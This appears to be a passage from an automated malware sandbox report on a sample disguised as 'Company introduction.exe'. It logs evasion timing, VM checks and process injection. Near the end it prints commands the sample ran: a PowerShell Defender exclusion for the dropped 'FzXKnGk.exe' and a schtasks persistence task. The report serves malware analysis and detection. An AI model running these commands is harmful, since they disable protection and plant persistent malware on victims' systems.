                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599765
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599648
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599545
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598890
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598672
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598546
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597884
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597671
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597552
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597000
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596890
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596672
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596562
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596343
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596164
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596060
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595940
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595729
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595625
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595515
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595406
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595297
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595187
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595078
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594968
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594859
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594750
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594640
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594530
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594422
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7726Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1957Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeWindow / User API: threadDelayed 2278Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeWindow / User API: threadDelayed 7571Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeWindow / User API: threadDelayed 2141
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeWindow / User API: threadDelayed 7694
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 7472Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7880Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -26747778906878833s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -599891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8136Thread sleep count: 2278 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8136Thread sleep count: 7571 > 30Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -599641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -599531s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -599421s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -599306s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -599202s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -599084s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598844s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598625s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598281s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598172s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -598049s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597366s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -597030s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596266s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596141s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -596016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595797s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595358s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595250s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595141s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -595016s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -594891s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -594781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -594672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -594562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exe TID: 8108Thread sleep time: -594453s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7912Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep count: 36 > 30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -33204139332677172s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -600000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7180Thread sleep count: 2141 > 30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -599871s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7180Thread sleep count: 7694 > 30
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -599765s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -599648s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -599545s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -599437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -599328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -599218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -599109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598999s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598546s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -598109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597999s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597884s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597671s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597552s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597437s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597328s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597218s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597109s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -597000s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -596890s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -596781s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -596672s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -596562s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -596453s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -596343s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -596164s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -596060s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -595940s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -595729s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -595625s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -595515s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -595406s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -595297s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -595187s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -595078s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -594968s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -594859s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -594750s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -594640s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -594530s >= -30000s
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exe TID: 7184Thread sleep time: -594422s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599421Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599306Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599202Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 599084Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598953Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598844Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598734Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598625Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598406Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598281Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598172Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 598049Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597812Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597703Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597594Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597484Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597366Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597250Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 597030Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596594Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596266Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596141Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 596016Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595906Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595797Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595687Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595578Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595468Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595358Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595250Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595141Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 595016Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594891Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594781Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594672Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594562Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeThread delayed: delay time: 594453Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599871
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599765
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599648
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599545
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 599109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598890
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598672
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598546
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 598109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597999
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597884
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597671
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597552
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597437
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597328
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597218
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597109
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 597000
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596890
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596781
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596672
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596562
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596453
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596343
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596164
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 596060
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595940
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595729
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595625
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595515
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595406
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595297
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595187
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 595078
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594968
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594859
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594750
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594640
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594530
                Source: C:\Users\user\AppData\Roaming\FzXKnGk.exeThread delayed: delay time: 594422
                Source: FzXKnGk.exe, 0000000C.00000002.2938862935.00000000015EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll5
                Source: Company introduction.exe, 00000006.00000002.2939061620.00000000013C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllo
                Source: FzXKnGk.exe, 00000007.00000002.1754239907.00000000007C2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}{
                Source: C:\Users\user\Desktop\Company introduction.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeCode function: 6_2_05A89548 LdrInitializeThunk,LdrInitializeThunk,6_2_05A89548
                Source: C:\Users\user\Desktop\Company introduction.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\Company introduction.exeMemory written: C:\Users\user\Desktop\Company introduction.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\FzXKnGk.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FzXKnGk" /XML "C:\Users\user\AppData\Local\Temp\tmpE629.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Company introduction.exeProcess created: C:\Users\user\Desktop\Company introduction.exe "C:\Users\user\Desktop\Company introduction.exe"Jump to behavior
